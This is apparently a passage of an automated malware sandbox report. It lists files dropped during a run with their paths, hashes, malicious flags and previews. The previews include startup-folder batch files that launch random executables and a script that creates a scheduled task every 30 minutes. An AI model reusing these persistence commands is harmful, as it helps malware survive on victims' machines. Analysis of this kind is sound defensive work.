                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cPDXi3YsHb2JKplcNt2ulL4v.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.830799402808093
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5wJNvgLzjRLAsn:fE1923wJqHjtv
                                                                                                                                                                                                                                                            MD5:CC6B05488E0F7ADA298E067CCDEDD70A
                                                                                                                                                                                                                                                            SHA1:0B09A3E36198454F4DA3C07C77FABDA1C659C762
                                                                                                                                                                                                                                                            SHA-256:5A363E87F8911598F5DC6B5216D3CDDDA1A0176475F96A6EB142C94DCA2A67F8
                                                                                                                                                                                                                                                            SHA-512:428727D7F82A5F7ED40C7E0946197C3340D59724489D63CF3849EF0E83B12FEC2E36F731662DD7F41BFFC6C92B3AD9EFCA7900FA0353993AA203F55588F664C4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\UbeikbXa4CwwIN3M94pDVFss.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cXcTyLUx7TcAqwa1PaqAe42l.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.693518824601853
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5O3KeCX1TVL4mn:fE1923O6xlTVkm
                                                                                                                                                                                                                                                            MD5:302040BFF832D80D01E85D2451216076
                                                                                                                                                                                                                                                            SHA1:D6BEC57D2D7D5B73AC28AC72CF4E2A96C125C6B5
                                                                                                                                                                                                                                                            SHA-256:3859E86B6A0436B29ED7A970B76DCBA93B8F2E818B1DDAF12644C1E8B4574041
                                                                                                                                                                                                                                                            SHA-512:E28F1A36669F837D1B32AF5EBC42DD8D282447D04FEF32B42B00778B2BBF025BB3DDD530A730248094BB3068B146CCF3BF5BCC8C54B03C332237DF6473E4368F
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\kCfcZTexs2vlrkxr2iahpjn0.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cgfjpHdWrKt7RBbVJLVt3KrQ.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.942231817947811
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J51WD/o66KrF:fE1923D65R
                                                                                                                                                                                                                                                            MD5:B41573AE7FF078AC65B13504521CD94C
                                                                                                                                                                                                                                                            SHA1:5B0FED204A8D0890089A983AB607ADF7D578AC53
                                                                                                                                                                                                                                                            SHA-256:4BC21647BA95D987ABF86E025C12BB27A1900EF2BEDC25FD682EB8A2F9D72D0B
                                                                                                                                                                                                                                                            SHA-512:C904C9079E5C23B67D1ACA2246DB1BCEFE73268F2567D5F581F1663075B5DF339C3D3E3167D627E29951F18C43EFDE1E2C342508AF80B9F8EC27FF995AEB4011
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\PsfJgdgdADnk5mVYPGyLWZVX.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cizDnjn04HXlR48gG87ono06.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.749235032171712
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5H3ZkG7taHNl:fE1923XZDwl
                                                                                                                                                                                                                                                            MD5:677592C35AAA9FA1081B93A1B84C36E5
                                                                                                                                                                                                                                                            SHA1:EA14D1DB1F0B3DC1F7607BB78F6A72D80BBCA4E6
                                                                                                                                                                                                                                                            SHA-256:C305B8443F2458446183093CD95ECDBF6EDB279D78F4D9906FCA847DD77F1354
                                                                                                                                                                                                                                                            SHA-512:0140AF6FCEBCAF5AD1110AFB80517285F5838CCB0D4062A62B20534FF6721469D11CE40E16FEE5F87E6DC774A26A5DA66D72AAE4B81EF2E2080145801360F0FC
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\buQDl25QOPcDefNxAl6eKA66.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iFau6s6nP0Npku3mzBCNvuor.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.702278511060241
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5zb2uupOJ0sn:fE1923P2uhJ0s
                                                                                                                                                                                                                                                            MD5:1BD207CC087E97DDE24B44BCCD793CEF
                                                                                                                                                                                                                                                            SHA1:7738748AF01B6F9C86915A5954800BAB402E9317
                                                                                                                                                                                                                                                            SHA-256:0358B682C3BAEAD0DA4B8CF97B1C46F9BC486625800294B5455408D805BEE1B8
                                                                                                                                                                                                                                                            SHA-512:D6B631F0665701461AA90FA5497BA299503D6DDBAFE040DFDC02ABD6871DCE6A2B6D7F768D7ADB7EDCAB40F087F71969A03550CD4DFBEB55BF9703505D5D5A0B
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\VeFiHaAJqD2MVtOotjaLLiHl.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kiXcuJUJS97MOwYXLopyQBva.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.7937981104397664
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5HpKqr5cmz3m:fE1923JKqr5cKm
                                                                                                                                                                                                                                                            MD5:D60DC6601BEC42D775D30A96831DC2A9
                                                                                                                                                                                                                                                            SHA1:2B737303385F66405A7C07DB72620316DA4A87F5
                                                                                                                                                                                                                                                            SHA-256:2C01BA23A9AFFD7B5686E020D5C602F6F7E7824B5DB354BF5305C0405A84CA98
                                                                                                                                                                                                                                                            SHA-512:933C39DF6EA107F056AD969BE8A759B5F99B3C14900474CBE23A8D6DD07DECC419391A68ECA3AA78D1F0B505B6DEEA47C9210EB8BED294D2B9A5360776F6FD67
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIfCnFQFL1iakCTbZHUvqqRQ.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.947439360470674
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5TlTAir/km:fE1923R
                                                                                                                                                                                                                                                            MD5:667B1FD1CB108826C7E458B9B0700DAD
                                                                                                                                                                                                                                                            SHA1:836301901A8A6CC86C7D42B7646853D574183BE5
                                                                                                                                                                                                                                                            SHA-256:21A36F53CDBEC7F9498655E1EB039AFBED97D4C2B1EB643F34A67CF543122B5B
                                                                                                                                                                                                                                                            SHA-512:95E022058488788D9C77666729ACA21F25D571D87B000C527ADFBDA9560B5EFBE9AEAF46EBAADF92F97301BB13719750BFC21C7F64496C21AA849F91BCD0E176
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\vODV6f1qBtycrG7AEUewXqSZ.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tP1HwHnBrmkAp5HYbvKx3soV.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.7736565456652365
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5du9gUadYKpFn:fE1923QgUa9
                                                                                                                                                                                                                                                            MD5:C2B923C5C759C775EE1A3C01E778C2B3
                                                                                                                                                                                                                                                            SHA1:03AE1D380CF847E8F70AFA09B6218E95FF58B4F0
                                                                                                                                                                                                                                                            SHA-256:B44ECA66CC194539235B358E1C06ADB7418BFAE5F3D57E0B1F61598C67885FFB
                                                                                                                                                                                                                                                            SHA-512:70A0BDD7FF7ABB377A8A082037EBBCE6F8D22AA89D0D3C3241573B9507676DE13EAAA7B00BEDAF7B22199108B60AD6A53E520FBCDC87D0F602326C861D4653A5
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\xKfa5BEne98Q6CDxSSuxDfob.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xEGgxKMHj9iJfbRcoMlSL4NY.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.845733425059762
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5UFAdoTE/ul:fE1923UF4gE/4
                                                                                                                                                                                                                                                            MD5:CA640BEF41E8E40A922BEA68CF4BF7F8
                                                                                                                                                                                                                                                            SHA1:AEE4EBF8C4AFC909DAB5B8CDEF5E7379C18F062D
                                                                                                                                                                                                                                                            SHA-256:541E011BAFE4BF6477287EE44AD3D22274727809B682179888AF3298D4292CE9
                                                                                                                                                                                                                                                            SHA-512:ED693C9ABD8FEC4C76135F9C410EA3A371EEE05631DCBE055FC8BFF922D6227D6CD8A146CC60D3F0BC1CF54613A9792FB967A3572503ACD1050223E10A3D300C
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\qn8N72lxWeACAPN7HO6efjE8.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\index.html

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (313)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1948
                                                                                                                                                                                                                                                            Entropy (8bit):4.505190219336192
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:hYeJMwYtM5/NbaUsRYklU/UQJ/dXwtTIFzHJg0de1evoJXE+yQy7trAQDdbrarPd:nXafrqPiIZLdeUvoJX+dfdbOrPv+w
                                                                                                                                                                                                                                                            MD5:12CF60E57791E7A8BD78033C9F308931
                                                                                                                                                                                                                                                            SHA1:F6C8A295064F7FA8553295E3CD8A9C62352F7C2C
                                                                                                                                                                                                                                                            SHA-256:2F9F2FE135D66C296AB6071D01529623BAC31D4A63AB073BE3C6C1E20D34F50A
                                                                                                                                                                                                                                                            SHA-512:72735D76803980AFE7260D713A377F82316FA24109F1D2767B352984AA53D4A5E441A89D99AA3FDB32042DCB61B43D88465272BC98552892747829D7986CF3B2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <meta http-equiv="X-UA-Compatible" content="IE=edge" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <title>Document</title>. <style>. . body {. padding: 20px;. background-color: #f6f8fc;. }. .main {. width: 900px;. margin: 0 auto;. text-align: center;. background-color: #fff;. padding: 20px;. }. .main h2 {. padding-bottom: 20px;. }. .main a {. background: #1a73e8;. color: #fff;. height: 40px !important;. display: block;. width: 100px !important;. margin: 0 auto;. line-height: 38px !important;. margin-top: 20px;. outline: none;. border: 1px solid;. font-size: 16px;. cursor: pointer;. text-decoration: none;. }. input {. height: 32px;. line-height: 32px;. background-color

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\logo.png

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 222 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2967
                                                                                                                                                                                                                                                            Entropy (8bit):7.913357508524536
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:1URrn/9eEsyo0EeDcQ4ltBljxjzQz4EJcDUe8E+afOp8L2rZ5lFw5CiSJzJ8Xp9T:2RZt7wurUCcE2DT8wZL2FkCVl8PRTJR1
                                                                                                                                                                                                                                                            MD5:561A5A310AC6505C1DC2029A61632617
                                                                                                                                                                                                                                                            SHA1:F267AB458EC5D0F008A235461E466B1FD3ED14EE
                                                                                                                                                                                                                                                            SHA-256:B41BD7C17B6BDFE6AE0D0DBBB5CE92FD38C4696833AE3333A1D81CF7E38D6E35
                                                                                                                                                                                                                                                            SHA-512:4EDB7EF8313E20BBC73FD96207C2076CE3BAC0754A92BB00AFF0259FFE1ADF6F7E4D6917E7815FD643139A08BD4A0F325F66982378F94483CE1EE0924DF6D3C5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......0.....~).E....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx..]..UU.>..@....Q.1..M0.Q,.d4...AG.B..1..3...VF...".PB..V".%h.Q....J0.."..}...rf...y..f....:o.=......g.}...xb.K......u....^=.Mw.C.C3......`0.3...x..1..`0.3...J........$.........z......i.....0.G`.vYo....E.}Pg.q...x..x..sB.o......_..[...Q..^.J.cA...E..f.M...3. .......q!....;b..i..z..)$.z...W".;.+h.....)_.LwS>..TM.G....4..E0..O)q.Ag.~o.q........._.^...z[.[..l.Z,.;..rcx#.......(.....G&..fz).d.$l...........=.q..>.....:v.56.&.^...bP.j.P.8O../.t..> ?g...F..0..zI1.T.$..l...U....!..E..J."..f{....H.o.1..v....E..aD.A.Wm]^.h...ml.&...g..;&T...VGn..Y..L.E.~.'.usa...Qe..E.I...?S..).2F...u./..@mD.n.1.Sd....y:I. ..........2....l.R7%..bH8M...".6......1.....O_.9V)..V..x....Cu.. ..). 2...W@<#].r......*.g.^Uh.{".Q.x:(..&..=)..;.......a....).[b.{,.iE.^.Q...vY.ZDH`..u.sw.W......I......e'}..A.s..-...i.#...#.w.....C.\#.gA3B.(......H.}H?..mh......sk.....^.\.+bJ..^n=.wi4....,...#Q....r.W..

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\qrcode.png

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 400 x 400, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2315
                                                                                                                                                                                                                                                            Entropy (8bit):6.943143412126543
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:zEbbbzUbsSJ1kbrSAkbreb3bydbcqRbhS7SejSZQ7SknTb6ASme9HSBNSEbz5zSy:e0mSXwCrCDbST3YZUu
                                                                                                                                                                                                                                                            MD5:93A1A761D17CA266066A4B8E286DAC1D
                                                                                                                                                                                                                                                            SHA1:63B13D8F13FE092AA1CD18DFEA86C8C4CF2D5A8D
                                                                                                                                                                                                                                                            SHA-256:BAD6F97F076CF04517A03820B486A2FFE564C2D0EF350932612CC40BEEC39F6A
                                                                                                                                                                                                                                                            SHA-512:5D3360D096DA7A6B724CC68504DAC6691285807F2ACA361BBE27CA22ACDFE734ABF4EE4A4E2F9C55D7F94BB22D50062B19AF0A4DD34939CF4673BAA1746871BC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR....................pHYs..........+......IDATx...Ar.8..Ay.......E.A....X.(......../...N/..]..d...!X@.`....d...!X@.`....d...!X@.`....d...!X@.`....d...!X@.....~e.7[..1.....r.....p...t|.7..HvX@.`....d...!X@.`....d...!X@.`........X....s'?....8>.s....../.......2...., C.....2...., C.....2...,.?.d..5.....{...l....?.i..O.e......!X@.`....d...!X@.`....d...q~4......_.i>].{...`....., C.....2...., C.....2...../...0|.w....}..;o..".`..d...!X@.`....d...!X@.`....d...q~4........&o....5.._.).a....d...!X@.`....d...!X@.`....dl........g....x.#..z....z....!X@.`....d...!X@.`....d...!X@.t4.......a>.....CK.....o`..d...!X@.`....d...!X@.`....d....u| `.q)s....K....c+..........7......, C.....2...., C.....2....B1....s.K.`.."...F}.6;>42g..d...!X@.`....d...!X@.`....d...q...............Rq.`...|.5<~......2...., C.....2...., C.....2..9..6~6..8~......0...+<>{4w.G...2...., C.....2...., C.....2......0V.3#......./.U.......2...., C.....2...., C.....2....|...L..3.K..E.....v....t9>|

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Temp\Task.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):129
                                                                                                                                                                                                                                                            Entropy (8bit):4.809875578583948
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAuUkh4E2J5xAIEyrKBySKFS3:Ogas7SXEFAu923faKS3
                                                                                                                                                                                                                                                            MD5:A60AD3B864BC5B7F3BC6056968D8343B
                                                                                                                                                                                                                                                            SHA1:308D6F187B22DDCA1F6328F799EF62E1C505FF61
                                                                                                                                                                                                                                                            SHA-256:9FA192F23FAB9E060AA78499C4B77D7479504903DF0B4B5C458F699FFBDB7CB5
                                                                                                                                                                                                                                                            SHA-512:9A59F89C404CAF5EAD1DC8127F1AA62083BD5324C8E111E3A8724C6427E83E05980FF7197F919A787E7DD66B08EE41C962B97A5DF9B6A771C3E7084289548133
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..

                                                                                                                                                                                                                                                            C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.fL..5L..5L..5...5N..5k..5X..5k..5&..5k..5`..5...5C..5L..5...5k..5J..5k..5M..5RichL..5................PE..L...?..e.............................3............@.................................Ua......................................d...........X...............................................................@............................................text...\........................... ..`.rdata..............................@..@.data....-....... ..................@....rsrc...X...........................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
